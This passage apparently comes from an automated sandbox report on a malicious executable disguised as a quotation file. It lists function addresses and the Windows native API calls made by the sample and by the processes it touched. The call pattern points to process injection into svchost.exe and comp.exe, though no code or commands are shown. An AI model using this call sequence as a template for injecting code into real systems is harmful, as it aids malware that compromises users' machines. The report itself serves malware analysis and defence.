                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03762BF0 NtAllocateVirtualMemory,LdrInitializeThunk,13_2_03762BF0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03762BE0 NtQueryValueKey,LdrInitializeThunk,13_2_03762BE0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03762BA0 NtEnumerateValueKey,LdrInitializeThunk,13_2_03762BA0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03762AF0 NtWriteFile,LdrInitializeThunk,13_2_03762AF0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03762AD0 NtReadFile,LdrInitializeThunk,13_2_03762AD0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03762F30 NtCreateSection,LdrInitializeThunk,13_2_03762F30
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03762FE0 NtCreateFile,LdrInitializeThunk,13_2_03762FE0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03762FB0 NtResumeThread,LdrInitializeThunk,13_2_03762FB0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03762EE0 NtQueueApcThread,LdrInitializeThunk,13_2_03762EE0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03762E80 NtReadVirtualMemory,LdrInitializeThunk,13_2_03762E80
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03762D30 NtUnmapViewOfSection,LdrInitializeThunk,13_2_03762D30
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03762D10 NtMapViewOfSection,LdrInitializeThunk,13_2_03762D10
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03762DF0 NtQuerySystemInformation,LdrInitializeThunk,13_2_03762DF0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03762DD0 NtDelayExecution,LdrInitializeThunk,13_2_03762DD0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03762C70 NtFreeVirtualMemory,LdrInitializeThunk,13_2_03762C70
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03762C60 NtCreateKey,LdrInitializeThunk,13_2_03762C60
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03762CA0 NtQueryInformationToken,LdrInitializeThunk,13_2_03762CA0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037635C0 NtCreateMutant,LdrInitializeThunk,13_2_037635C0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037639B0 NtGetContextThread,LdrInitializeThunk,13_2_037639B0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03762B80 NtQueryInformationFile,13_2_03762B80
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03762AB0 NtWaitForSingleObject,13_2_03762AB0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03762F60 NtCreateProcessEx,13_2_03762F60
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03762FA0 NtQuerySection,13_2_03762FA0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03762F90 NtProtectVirtualMemory,13_2_03762F90
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03762E30 NtWriteVirtualMemory,13_2_03762E30
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03762EA0 NtAdjustPrivilegesToken,13_2_03762EA0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03762D00 NtSetInformationFile,13_2_03762D00
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03762DB0 NtEnumerateKey,13_2_03762DB0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03762C00 NtQueryInformationProcess,13_2_03762C00
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03762CF0 NtOpenProcess,13_2_03762CF0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03762CC0 NtQueryVirtualMemory,13_2_03762CC0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03763010 NtOpenDirectoryObject,13_2_03763010
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03763090 NtSetValueKey,13_2_03763090
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03763D70 NtOpenThread,13_2_03763D70
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03763D10 NtOpenProcessToken,13_2_03763D10
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_02E892F0 NtClose,13_2_02E892F0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_02E89250 NtDeleteFile,13_2_02E89250
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_02E89160 NtReadFile,13_2_02E89160
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_02E89450 NtAllocateVirtualMemory,13_2_02E89450
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_02E88FF0 NtCreateFile,13_2_02E88FF0
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E6A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00E6A1EF
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E58310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00E58310
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00E651BD
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E0E6A00_2_00E0E6A0
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E2D9750_2_00E2D975
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E0FCE00_2_00E0FCE0
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E221C50_2_00E221C5
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E362D20_2_00E362D2
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E803DA0_2_00E803DA
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E3242E0_2_00E3242E
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E225FA0_2_00E225FA
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E166E10_2_00E166E1
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E5E6160_2_00E5E616
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E3878F0_2_00E3878F
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E688890_2_00E68889
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E368440_2_00E36844
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E808570_2_00E80857
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E188080_2_00E18808
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E2CB210_2_00E2CB21
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E36DB60_2_00E36DB6
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E16F9E0_2_00E16F9E
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E130300_2_00E13030
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E2F1D90_2_00E2F1D9
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E231870_2_00E23187
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E012870_2_00E01287
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E214840_2_00E21484
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E155200_2_00E15520
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E276960_2_00E27696
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E157600_2_00E15760
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E219780_2_00E21978
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E39AB50_2_00E39AB5
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E87DDB0_2_00E87DDB
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E2BDA60_2_00E2BDA6
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E21D900_2_00E21D90
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E13FE00_2_00E13FE0
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E0DF000_2_00E0DF00
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_01050E880_2_01050E88
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_026585B34_2_026585B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_026412404_2_02641240
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02641B474_2_02641B47
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02641B504_2_02641B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_026410E04_2_026410E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_026430D04_2_026430D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_026500A34_2_026500A3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0264E0834_2_0264E083
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0264E1C74_2_0264E1C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0264E1D34_2_0264E1D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0264FE7B4_2_0264FE7B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0264FE834_2_0264FE83
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_026567B34_2_026567B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0266EC634_2_0266EC63
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_026424304_2_02642430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030FA3524_2_030FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0304E3F04_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_031003E64_2_031003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030E02744_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030C02C04_2_030C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030301004_2_03030100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030DA1184_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030C81584_2_030C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_031001AA4_2_031001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030F81CC4_2_030F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030D20004_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030647504_2_03064750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030407704_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303C7C04_2_0303C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0305C6E04_2_0305C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030405354_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_031005914_2_03100591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030E44204_2_030E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030F24464_2_030F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030EE4F64_2_030EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030FAB404_2_030FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030F6BD74_2_030F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303EA804_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030569624_2_03056962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030429A04_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0310A9A64_2_0310A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0304A8404_2_0304A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030428404_2_03042840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030268B84_2_030268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306E8F04_2_0306E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03082F284_2_03082F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03060F304_2_03060F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030E2F304_2_030E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B4F404_2_030B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030BEFA04_2_030BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03032FC84_2_03032FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0304CFE04_2_0304CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030FEE264_2_030FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03040E594_2_03040E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03052E904_2_03052E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030FCE934_2_030FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030FEEDB4_2_030FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0304AD004_2_0304AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030DCD1F4_2_030DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03058DBF4_2_03058DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303ADE04_2_0303ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03040C004_2_03040C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030E0CB54_2_030E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03030CF24_2_03030CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030F132D4_2_030F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0302D34C4_2_0302D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0308739A4_2_0308739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030452A04_2_030452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0305B2C04_2_0305B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030E12ED4_2_030E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0307516C4_2_0307516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0302F1724_2_0302F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0310B16B4_2_0310B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0304B1B04_2_0304B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030EF0CC4_2_030EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030470C04_2_030470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030F70E94_2_030F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030FF0E04_2_030FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030FF7B04_2_030FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030F16CC4_2_030F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030F75714_2_030F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030DD5B04_2_030DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030FF43F4_2_030FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030314604_2_03031460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030FFB764_2_030FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0305FB804_2_0305FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B5BF04_2_030B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0307DBF94_2_0307DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030FFA494_2_030FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030F7A464_2_030F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B3A6C4_2_030B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030DDAAC4_2_030DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03085AA04_2_03085AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030E1AA34_2_030E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030EDAC64_2_030EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030D59104_2_030D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030499504_2_03049950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0305B9504_2_0305B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030AD8004_2_030AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030438E04_2_030438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030FFF094_2_030FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03041F924_2_03041F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030FFFB14_2_030FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03049EB04_2_03049EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03043D404_2_03043D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030F1D5A4_2_030F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030F7D734_2_030F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0305FDC04_2_0305FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B9C324_2_030B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030FFCF24_2_030FFCF2
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeCode function: 12_2_03062EBF12_2_03062EBF
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeCode function: 12_2_03083AF212_2_03083AF2
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeCode function: 12_2_0306306212_2_03063062
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeCode function: 12_2_03062F1212_2_03062F12
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeCode function: 12_2_03064F3212_2_03064F32
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeCode function: 12_2_0306B64212_2_0306B642
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeCode function: 12_2_03064D0A12_2_03064D0A
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeCode function: 12_2_03064D1212_2_03064D12
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037EA35213_2_037EA352
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0373E3F013_2_0373E3F0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037F03E613_2_037F03E6
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037D027413_2_037D0274
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037B02C013_2_037B02C0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037B815813_2_037B8158
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037CA11813_2_037CA118
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0372010013_2_03720100
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037E81CC13_2_037E81CC
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037F01AA13_2_037F01AA
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037C200013_2_037C2000
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0373077013_2_03730770
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0375475013_2_03754750
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0372C7C013_2_0372C7C0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0374C6E013_2_0374C6E0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0373053513_2_03730535
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037F059113_2_037F0591
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037E244613_2_037E2446
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037DE4F613_2_037DE4F6
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037EAB4013_2_037EAB40
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037E6BD713_2_037E6BD7
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0372EA8013_2_0372EA80
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0374696213_2_03746962
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037329A013_2_037329A0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037FA9A613_2_037FA9A6
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0373A84013_2_0373A840
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0373284013_2_03732840
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0375E8F013_2_0375E8F0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037168B813_2_037168B8
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037A4F4013_2_037A4F40
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03750F3013_2_03750F30
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03772F2813_2_03772F28
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0373CFE013_2_0373CFE0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03722FC813_2_03722FC8
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037AEFA013_2_037AEFA0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03730E5913_2_03730E59
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037EEE2613_2_037EEE26
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037EEEDB13_2_037EEEDB
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03742E9013_2_03742E90
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037ECE9313_2_037ECE93
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0373AD0013_2_0373AD00
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0372ADE013_2_0372ADE0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03748DBF13_2_03748DBF
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03730C0013_2_03730C00
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03720CF213_2_03720CF2
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037D0CB513_2_037D0CB5
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0371D34C13_2_0371D34C
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037E132D13_2_037E132D
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0377739A13_2_0377739A
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037D12ED13_2_037D12ED
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0374B2C013_2_0374B2C0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037352A013_2_037352A0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0371F17213_2_0371F172
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037FB16B13_2_037FB16B
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0376516C13_2_0376516C
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0373B1B013_2_0373B1B0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037E70E913_2_037E70E9
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037EF0E013_2_037EF0E0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037DF0CC13_2_037DF0CC
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037370C013_2_037370C0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037EF7B013_2_037EF7B0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037E16CC13_2_037E16CC
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037E757113_2_037E7571
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037CD5B013_2_037CD5B0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0372146013_2_03721460
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037EF43F13_2_037EF43F
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037EFB7613_2_037EFB76
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037A5BF013_2_037A5BF0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0376DBF913_2_0376DBF9
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0374FB8013_2_0374FB80
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037A3A6C13_2_037A3A6C
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037EFA4913_2_037EFA49
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037E7A4613_2_037E7A46
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037DDAC613_2_037DDAC6
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037CDAAC13_2_037CDAAC
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03775AA013_2_03775AA0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0373995013_2_03739950
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0374B95013_2_0374B950
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037C591013_2_037C5910
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0379D80013_2_0379D800
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037338E013_2_037338E0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037EFF0913_2_037EFF09
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037EFFB113_2_037EFFB1
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03731F9213_2_03731F92
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03739EB013_2_03739EB0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037E7D7313_2_037E7D73
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037E1D5A13_2_037E1D5A
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03733D4013_2_03733D40
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0374FDC013_2_0374FDC0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037A9C3213_2_037A9C32
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037EFCF213_2_037EFCF2
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_02E71C0013_2_02E71C00
